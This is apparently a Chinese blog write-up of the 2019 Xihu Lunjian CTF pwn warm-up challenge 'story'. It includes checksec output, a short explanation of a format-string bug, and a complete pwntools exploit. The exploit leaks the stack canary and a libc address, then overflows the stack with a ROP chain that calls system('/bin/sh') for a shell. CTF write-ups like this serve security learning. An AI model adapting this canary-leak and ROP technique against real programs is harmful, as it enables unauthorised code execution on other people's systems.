美文网首页
西湖论剑2019pwn签到题

西湖论剑2019pwn签到题

作者: Sadmess | 来源:发表于2019-04-07 23:04 被阅读0次
a@ubuntu:~$ python 1.py
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

[+] Starting local process './story': pid 43352
[*] '/home/a/story'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

main函数


image.png

输入id有一个格式化字符串漏洞


因为程序开启了canary保护,所以只能先通过printf泄露canary之后控制程序流程重新执行main函数,再次利用printf输出libc地址

from pwn import *

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_printf=libc.symbols['printf']
print libc_printf
#p = remote('ctf3.linkedbyx.com',11095)
p=process('./story')
payload='%15$p'
#gdb.attach(p)
p.sendline(payload)
p.recvuntil('Hello ')
canary=int(p.recv()[0:18],16)
print canary
p.sendline('144')
payload='A'*136+p64(canary)+p64(0xdeedbeef)+p64(0x400780)
p.sendline(payload)
p.recvuntil('Please Tell Your ID:')
payload='AAAA%9$s'+'\xc1\x1f\x60'
p.sendline(payload)
p.recvuntil('AAAA')
print_got = u64(p.recv()[0:5].ljust(8,'\x00'))*16*16
libc_base=print_got-libc_printf

system_addr = libc_base + libc.symbols['system']

binsh_addr = libc_base + 0x18cd57
print binsh_addr
p.sendline('144')
gdb.attach(p)
payload='A'*136+p64(canary)+p64(binsh_addr)+p64(0x400bd3)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload)
#print fmtstr_payload(8, {0x601f98: 0x601fd8}, 0, write_size='short')
p.interactive()

相关文章

  • 西湖论剑2019pwn签到题

    main函数 输入id有一个格式化字符串漏洞 因为程序开启了canary保护,所以只能先通过printf泄露can...

  • 西湖论剑

    阳春三月,百花盛开,夜幕下西湖边游人如织。苏堤楼外楼门口坐着几桌客人,欢声笑语好不热闹。 孔乙己一个人坐在...

  • 西湖论剑线上 writeup

    西湖论剑 太菜了最后只有18名都怪我划水还是得夸aris和liano太强了 WEB web1 hint :dir....

  • 2019 西湖论剑 WriteUp

    Web babyt3 登录看到: 尝试文件包含: 得到源码: 读取dir.php的源码: 得到源码: 构造去查看根...

  • large bin attack 利用分析

    例题 西湖论剑 - storm note (学习资料参考链接)[https://ch4r1l3.github.io...

  • 2019-04-11

    西湖论剑 -web 1、babyt3 页面中出现include $_GET['file'],查看源代码,在最后发现...

  • 【CTF-HarekazeCTF2018】部分题目Writeup

    HarekazeCTF2018 Warmup签到题 0x01 welcome flag 真正的签到题: 0x02...

  • “西湖论剑杯”比赛体会

    写在前面: 这次连续参加了个人赛与团队赛,感觉被大佬压制了。。。>﹏< 这次就写一些心得总结一下这次比赛中的不足好...

  • 2019 西湖论剑 | pwn wp

    story 保护 : full relro , stack canary , nx 程序流程 :获取用户 id ...

  • 西湖论剑 Flagshop 分析复现

    前言 比赛时候没能做出来,其实这道题就是一道pwn题。后面与p w n师傅讨论分析EXP分析还原了解题过程。学到了...

网友评论

      本文标题:西湖论剑2019pwn签到题

      本文链接:https://www.haomeiwen.com/subject/ittyiqtx.html